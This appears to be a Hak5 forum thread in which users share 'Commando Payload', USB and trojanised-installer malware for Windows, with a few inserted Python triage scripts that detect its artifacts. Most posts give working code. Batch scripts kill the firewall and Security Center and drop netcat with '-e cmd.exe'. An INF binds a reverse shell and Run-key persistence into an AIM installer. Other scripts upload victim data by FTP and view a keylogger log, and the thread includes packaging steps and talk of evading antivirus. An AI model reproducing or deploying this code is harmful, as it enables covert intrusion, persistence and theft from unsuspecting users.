
USB Commando Payload v3 Beta w/ Java's Method v2


sablefoxx


This is in response to this thread: http://forums.hak5.org/index.php/topic,7971.0.html

See Latest Post for v3.0 Beta / Java's Method v2

Current Stable Release 2.2

What it does:

Gives you a reverse shell on a computer. It comes in two flavors: my switchblade-style attack, and Javabudd's exe bind method. Both have the same features.

Sable's Method:

How to use:

Infect the target computer with the payload, go to your computer, and connect to the victim's computer with a reverse shell :)

nc.exe [host] [port] - To connect, use nc.exe from BiN or DL the full version here - Netcat

Commando Payload:

[*] U3 / Non U3 Compatible

[*] Copies NC.exe onto computer and runs it on port 69

[*] If autoexec.bat exists it will add itself into it

[*] Completely Stealthed

[*] Automatic Windows Firewall Kill and Security Center Disable

[*] Uses hidec.exe Not nircmd.exe to Avoid Anti-Virus

[*] Cleaner.bat to remove payload *See below for updated code*

[*] Removes Windows Firewall from Ctrl Panel (requires reboot)

[*] Autoruns at Startup Using a Regkey  - (thx to Javabudd)

[*] Added -t So you can telnet to victim  - (thx to Javabudd)

[*] Ctrl+Alt+Del Resistant                    - (thx to Javabudd)

Upcoming Addons:

[*] Bypass NAT (see Java's Method v2)

[*] U3 Vista Port (coming soon to Cmdo v3)

Enjoy, let me know if there are problems, hit me up on AIM (sablefoxx121) with questions.

Javabudd's Method

Binds nc.exe and some script to a legit installer (magicISO), so when you run the installer it not only installs magicISO but the payload as well.

------------------------------------------------------------------------------------------------------------------------------------------------------

Download Commando Payload Here (SiZE:81Kb - File:RAR - NonU3)

Commando Payload 2.2

Download Commando Payload Here (SiZE:151Kb - File:ISO - U3)

Commando Payload 2.2

Download Java's Method Here (SiZE:3Mb - File:EXE - WinXP/Vista)

Java's Method v1.0

===================================================================================

Feel Free to Add/Mod/Hack this code all you want!

-- MAD Props to javabudd, v2 kicks ass

Link to comment
Share on other sites

Ok, updated the payload, should auto disable Windows' firewall, kill security center, and add nc.exe to the exceptions list in case they turn the firewall back on.

Let me know if there are problems, as I didn't get a good chance to test everything.

Any ideas on howto bypass NAT?

  --Maybe auto join a VPN?

Link to comment
Share on other sites

I've got a perfect iexpress installer that I made that throws NC into %sys32% and with the switches -L and -d netcat stays open even if they ctrl alt del it.  And I'm also trying to add something that adds a registry key to HKLM/microsoft/windows/currentversion/run, anything in that key is run on startup with no questions asked and run perfectly stealthed :D

Link to comment
Share on other sites

I've got a perfect iexpress installer that I made that throws NC into %sys32% and with the switches -L and -d netcat stays open even if they ctrl alt del it.  And I'm also trying to add something that adds a registry key to HKLM/microsoft/windows/currentversion/run, anything in that key is run on startup with no questions asked and run perfectly stealthed :D

Hot! Send me teh code when its done!

Link to comment
Share on other sites

**Edit**

I changed the cabinet installer to put a directory in the windows folder named Attreb. Inside this folder is nc and all that shit. The only problem I'm having right now is adding this key to the registry so it auto runs nc -L -d -p 69 -e cmd.exe. I'm using INF files, anyone have any ideas?

Link to comment
Share on other sites

Updated payload to V2, look at above post for details!!

Here is the cleaner.bat code to remove the payload v2.2:

@echo off
cls
:: Kill the running listener, then remove the dropped files from system32
taskkill /f /im nc.exe
cd C:\WINDOWS\system32
del /f /q start.bat
del /f /q stop.bat
del /f /q hidec.exe
del /f /q nc.exe
:: Remove the startup key and un-hide the Firewall applet in Control Panel
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Attreb /f
reg delete "HKCU\Control Panel\don't load" /v Firewall.cpl /f
msg * "system clean"
exit

Link to comment
Share on other sites
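A defender's counterpart to cleaner.bat, added here as an example and not part of the original thread: instead of assuming the artifacts are present, it looks for them (the Attreb Run value, the hidden Firewall.cpl applet, a listener on port 69 owned by nc.exe) in constructed samples shaped like the output of reg query, netstat -ano and tasklist.

```python
import re
# Constructed host-triage samples shaped like "reg query /s", "netstat -ano" and
# "tasklist" output; the Attreb value and port 69 mirror what cleaner.bat removes.
RUN_EXPORT = (
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\n"
    "    ctfmon.exe    REG_SZ    C:\\WINDOWS\\system32\\ctfmon.exe\n"
    "    Attreb        REG_SZ    C:\\WINDOWS\\system32\\hidec.exe nc.exe -L -d -p 69 -e cmd.exe\n"
)
DONT_LOAD_EXPORT = (
    "HKEY_CURRENT_USER\\Control Panel\\don't load\n"
    "    Firewall.cpl    REG_SZ    No\n"
)
NETSTAT = (
    "  TCP    0.0.0.0:135    0.0.0.0:0    LISTENING    892\n"
    "  TCP    0.0.0.0:69     0.0.0.0:0    LISTENING    1644\n"
)
PID_TO_IMAGE = {892: "svchost.exe", 1644: "nc.exe"}
# Tokens that betray the netcat persistence this thread describes.
SHELL_MARKERS = ("nc.exe", "hidec", "nircmd", "-e cmd.exe")
VALUE_RE = re.compile(r"^\s+(\S+)\s+REG_\w+\s+(.*)$")

def suspicious_run_values(export):
    """Run-key values whose command line carries any shell marker."""
    hits = []
    for line in export.splitlines():
        m = VALUE_RE.match(line)
        if m and any(k in m.group(2).lower() for k in SHELL_MARKERS):
            hits.append((m.group(1), m.group(2)))
    return hits

def hidden_applets(export):
    """Applets hidden from Control Panel through the 'don't load' key."""
    return [m.group(1) for m in map(VALUE_RE.match, export.splitlines()) if m]

def shell_listeners(netstat, pid_to_image, watch_ports=(69,)):
    """LISTENING sockets owned by netcat or bound to a watched port."""
    hits = []
    for line in netstat.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[3] == "LISTENING":
            port, pid = int(parts[1].rsplit(":", 1)[1]), int(parts[4])
            image = pid_to_image.get(pid, "?")
            if port in watch_ports or image.lower() == "nc.exe":
                hits.append((port, pid, image))
    return hits

def triage():
    return {"run": suspicious_run_values(RUN_EXPORT),
            "hidden_cpl": hidden_applets(DONT_LOAD_EXPORT),
            "listeners": shell_listeners(NETSTAT, PID_TO_IMAGE)}
```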

Cmdo Payload v3.0 Development


Current State of Commando Payload 3.0 Beta:

[*] U3 / Non U3 Compatible

[*] Completely Stealthed

[*] Keylogger with Real Time Feed Back (rtk.bat) *New, Works but Buggy*

[*] Runs Reverse Shell on Port 69

[*] Easy to Use Connect to Victim Script *New*

[*] Automatic Windows Firewall Kill and Security Center Disable *Fixed*

[*] Uses hidec.exe Not nircmd.exe to Avoid Anti-Virus

[*] Cleaner.bat to remove payload *Updated for v3.0*

[*] Removes Windows Firewall from Ctrl Panel *Fixed*

[*] Autoruns at Startup Using a Regkey *Not Working Need Fix*

[*] Commented Code *New*

[*] Records IPconfig to txt in Logs dir *New*

[*] Won't Run if C:\safety.txt exists *New*

[*] NAT Traversal, Connect Through Routers *New, Only Works in Java's Method so far*

[*] Added -t So you can telnet to victim

--Everything is almost working, but before it gets released as the main payload I would like some people to test it, throw me some ideas on other things to add, and review my code and fix it, hehe.

---Codez---


Magik.bat - Script That Installs Payload
:0
@echo off
cls
:: Test for safty.txt
IF EXIST C:\safty.txt goto exit
:: Test to see if payload is already installed
IF EXIST C:\WINDOWS\system32\nc.exe goto exit
:: Test to see if there is a logs dir (Non-U3 only)
IF NOT EXIST Logs goto mklog
:1
:: Reg1 = Startup Key
:: Reg2 = Disables Firewall in Ctrl Panel
reg import "reg1.reg"
reg import "reg2.reg"
:: First poke a hole in window's firewall so that it will allow nc.exe
hidec /w stop.bat
:: Move files to location and run
xcopy /y /s .\BiN %systemroot%\system32
:: Make log (Non-U3 Only)
ipconfig /all>>.\Logs\%computername%.txt
:: Start Payload
cd C:\WINDOWS\system32
start k.exe
hidec nc.exe -l -t -p 69 -d -e cmd.exe
goto exit
:mklog
mkdir Logs
goto 1
:exit
exit



connect.bat - Easy Way to Connect to Victim, for the people out there who don't know what "nc.exe [host] [port]" means.

:setup
@echo off
cls
title Auto-NConnect
IF NOT EXIST nc.exe goto error
IF NOT EXIST makefile goto error
goto 1
:1
echo.
echo             ╔══════════════════════════════════════╗
echo             ║       Welcome to SableFoXx's         ║
echo             ║           Auto-NConnect              ║
echo             ╚══════════════════════════════════════╝
echo.
set /p target= Input IP of Target: 
echo. 
set /p port= Input Port (default 69): 
cls
title Reverse Shell Open
goto connect 
:connect
nc.exe %target% %port%
:error
cls
color c
echo BAD BLAK MAGiC, TRY AGAiN
pause
exit



stop.bat - stops windows firewall and security center

@echo off
cls
net stop "security center"
net stop "Windows Firewall/Internet Connection Sharing (ICS)"
exit



Real Time Keylogger View (Still Buggy)


Usage of rtk.bat:
Connect to host, go to %systemroot%\system32 and start rtk.bat; basically it displays the keylogger's log file and refreshes it. Working on a .html version that should work better than the current one.

rtk.bat:
@echo off
:1
:: clear screen
cls
:: display text in log
type C:\WINDOWS\system32\log.txt
:: pause before refresh
REM ******PAUSE******
set wait=0
:pause1
set /a wait=%wait%+1
if %wait% neq 250 goto :pause1
REM *****************
:: repeat/refresh
goto 1



Enjoy, let me know if there are problems, hit me up on AIM (sablefoxx121) with questions.
------------------------------------------------------------------------------------------------------------------------------------------------------
Download Commando Payload Here (SiZE:175Kb - File:RAR - NonU3)
Commando Payload 3.0 - Beta
===================================================================================
Please Post Code Fixes, New Ideas, and Anything on Your Mind

Link to comment
Share on other sites

HEY sable you're gonna like this one. I finally was able to incorporate a method to send their IP information. I created a few proggys to ipconfig /all the comp and create a text file ipaddr.txt in the sys32 directory. The other progy automatically connects to my ftp (No username or password needed because its already in the script :D) and uploads ipaddr.txt. This whole process takes about 1.3 seconds. Talk to me on aim if u want the code, i cant give it away here cuz it has my ftp info :/ Oh btw, you can scratch get External IP from upcoming additions :D

Link to comment
Share on other sites

Java v2.0

Current Progress on Java Installer Payload v2.0

[*] Completely Stealthed

[*] Bound to aim.exe (or any .exe installer you like)

[*] Reverse shell on port 69

[*] WORKS EVEN IF VICTIM HAS A ROUTER

[*] Implements an ipconfig /all > %computername%.txt

[*] Uploads "%computername%.txt" to an FTP server (I am going to include the code but with my FTP info taken out)

[*] Hidden.vbs and nircmd.exe used to never open up a cmd window (Installation and execution of nc.exe is never displayed)

[*] WILL EXPLAIN SETUP.INF AND INSTALLATION FURTHER DOWN

[*] And last but hopefully not the least, Anti virus does not pickup any of it. :D:D

Teh Codez

jvabd.bat:

@echo off
:: Executing IPCONFIG and creating .txt
ipconfig /all > c:\Windows\System32\%Computername%.txt
cls
:: Executing Script to send ipaddr to ftp :D
CALL .\hidden.vbs script.bat
:: Quitting
GOTO End
:End

hidden.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

script.bat

MAKE SURE YOU EDIT THE NECESSARY FIELDS

@ECHO OFF
:: Create the temporary script file
> script.ftp ECHO USER YOURUSERNAME
>>script.ftp ECHO PASSWORD
>>script.ftp ECHO binary
>>script.ftp ECHO prompt n
>>script.ftp ECHO put "C:\Windows\System32\%computername%.txt"
>>script.ftp ECHO QUIT
::Connect to the ftp and run the script
FTP -v -s:script.ftp FTPSERVER
:: Overwriting the temp script so this never happened :D
TYPE NUL >script.ftp
DEL script.ftp
EXIT

Setup.inf

MAKE SURE YOU EDIT THE NECESSARY FIELDS

; This INF File will install netcat in the TARGET system32 directory and implement the following command
; "nc.exe -e cmd.exe 0.0.0.0 69";where 0.0.0.0 is YOUR EXTERNAL ip address
; After the installation a registry key will be added on the victims computer to connect to 0.0.0.0 69
; any time you create a listen server on your computer
; Lets Begin:

[Version] 
Signature="$Chicago$"
AdvancedINF=2.0

[DefaultInstall]
Copyfiles=install.files
Copyfiles=installer.files
RunPostSetupCommands=RunPostSetupCommandsSection
AddReg=Add.Settings

[DestinationDirs]
; If you are using a different .exe installer switch the directory HERE
install.files=30,/Windows/System32
installer.files=30,/Program Files/AOL Instant Messenger

[install.files]
; These are the pwnage programs that will be installed into system32

jvabd.bat;ipconfig /all txt creator
script.bat;autoconnect to ftp and upload ipconfig txt :D
nc.exe; netcat of course:
nircmd.exe;hides cmd window 
hidden.vbs; hides cmd window while executing a batch in a batch 
setup.inf;inf file

[installer.files]
; The aim installer that installs into /program files/aol instant messenger;)
; TO ADD DIFFERENT .EXE INSTALLERS REMOVE AIM.EXE AND REPLACE WITH YOUR.EXE
aim.exe

[Add.Settings]
; Adding registry key to make nc run on boot :D
; Input your IP address into 0.0.0.0 and make sure you have port 69 forwarded to receive the reverse shell :D

HKLM,Software\Microsoft\Windows\CurrentVersion\Run,WinUpdate, 0x00000000, "C:\Windows\System32\nircmd execmd nc.exe -e cmd.exe 0.0.0.0 69"

[RunPostSetupCommandsSection]
; Programs are going to be listed in order of execution, including parameters (nc :D):
; ONCE AGAIN CHANGE 0.0.0.0 TO YOUR EXTERNAL IP
; If you have a different .exe installer replace aim.exe with your.exe once again

nircmd.exe execmd CALL nc.exe -e cmd.exe 0.0.0.0 69
nircmd.exe execmd CALL jvabd.bat
aim.exe

[SourceDiskNames]
1="default",,1


Instructions on creating the installer


Once you have created the jvabd.bat, hidden.vbs, script.bat and setup.inf it's time to compile these programs into 1 cabinet .exe installer. Create a folder and name it whatever the fuck you want and inside this folder include the following things: nc.exe, nircmd.exe, jvabd.bat, script.bat, setup.inf, hidden.vbs, and the installer of your choice. Don't worry, when you run the compiled version only the installer is shown, everything else gets stealth installed.

Now, when you have these 7 things inside a folder it's time to compile them into one. *Note* I have not found a method of doing this on Linux or Mac yet, being as they don't use .exe's. Click start - run - iexpress.exe. Choose "create new..." then click on "Extract files then run an installation command". Create a package title (I did AIM 5.9.8) then decide whether or not you want a confirmation message (This will install blah blah, are you sure?). Next skip the license crap and you will see "Package Files". Click add, browse to your folder with the pwnage in it, and add all 7 items (including your .exe installer).

Click next; on the next screen under "Install Program" choose SETUP.INF, not YOUR.EXE INSTALLER, and leave the post install command. Click next, leave the show window setting at recommended, click next, create a finished message if you like. Click next, name your installer.exe and choose the place you want to save it, also check "Hide file extracting progress animation from user". Choose no restart, and on the next screen save your project if you want. Click next, create the package, and you now have a legit installer that includes pwnage :D.

**IF YOU USE THIS AND GET FUCKED ITS NOT MY FAULT**

Link to comment
Share on other sites
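Added example, not Javabudd's code: a small triage parser for the INF inside an iexpress package, run over a constructed INF modeled on the Setup.inf above (the 0.0.0.0 placeholder is the page's own). It resolves what [DefaultInstall] copies and where, what AddReg persists and what RunPostSetupCommands executes, and flags the Run-key autostart and the netcat -e cmd.exe command line.

```python
import re
# Constructed INF modeled on the Setup.inf above (the 0.0.0.0 placeholder is the page's own).
SAMPLE_INF = """\
[DefaultInstall]
Copyfiles=install.files
RunPostSetupCommands=RunPostSetupCommandsSection
AddReg=Add.Settings

[DestinationDirs]
install.files=30,/Windows/System32

[install.files]
nc.exe; netcat of course
nircmd.exe;hides cmd window
[Add.Settings]
HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\Run,WinUpdate,0x00000000,"C:\\Windows\\System32\\nircmd execmd nc.exe -e cmd.exe 0.0.0.0 69"
[RunPostSetupCommandsSection]
nircmd.exe execmd CALL nc.exe -e cmd.exe 0.0.0.0 69
aim.exe
"""

def parse_inf(text):
    """Section name -> entries; ';' comments (assumed never inside quotes) and blanks dropped."""
    sections, cur = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1]
            sections[cur] = []
        elif line and cur is not None:
            sections[cur].append(line)
    return sections

def _refs(sections, key):
    """Section names given by 'key=...' lines of [DefaultInstall] (Copyfiles may repeat)."""
    return [e.split("=", 1)[1].strip() for e in sections.get("DefaultInstall", [])
            if e.split("=", 1)[0].strip().lower() == key.lower()]

def triage_inf(text):
    """What the package drops, persists and executes, plus reasons to worry."""
    s, flags = parse_inf(text), []
    dest = dict(e.split("=", 1) for e in s.get("DestinationDirs", []))
    copies = [(f, dest.get(sec, "?")) for sec in _refs(s, "Copyfiles") for f in s.get(sec, [])]
    reg = [e for sec in _refs(s, "AddReg") for e in s.get(sec, [])]
    cmds = [e for sec in _refs(s, "RunPostSetupCommands") for e in s.get(sec, [])]
    if any(re.search(r"\\Run\b", e, re.I) for e in reg):
        flags.append("adds a Run-key autostart")
    if any("nc.exe" in e.lower() and "-e cmd.exe" in e.lower() for e in reg + cmds):
        flags.append("launches netcat with -e cmd.exe (remote shell)")
    return {"copies": copies, "registry": reg, "commands": cmds, "flags": flags}
```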

  • 1 year later...
  • 3 months later...

As it just so happens, me and Javabudd recently resumed working on that project;


Nothing to release just yet, but here are a few features of the new version:

-Gui Interface (command line as well)

-Silent install option

-Auto Bypass Router

-Emails External IP/Info

-Customize each install using GUI

-Built in tools (such as wget)

-Option to install FTP server

-Even more

As always, when it's done I'll post all the source for everyone to play around with. :)

Edited by sablefoxx
Link to comment
Share on other sites

Could do a U3 version easily, been mulling over compiling my own version of NetCat to attempt avoiding AV detection, or even possibly coding my own in Python... not sure just yet, all in due time methinks.

Link to comment
Share on other sites

  • 3 weeks later...
Okk, thanks a lot! Will you be finished before April 1st?? Cause i'm going to test things during spring break :P

I will see if I can get something together by then, however I regret to inform everyone there has been a slight set back... I have obtained a Starcraft 2 Beta Key... :)

Link to comment
Share on other sites

I've been away for a while but I wouldn't mind getting back into developing new and improved switchblades... let me know if there's anything in particular that I can do to help... otherwise I'll just start hackin

Link to comment
Share on other sites
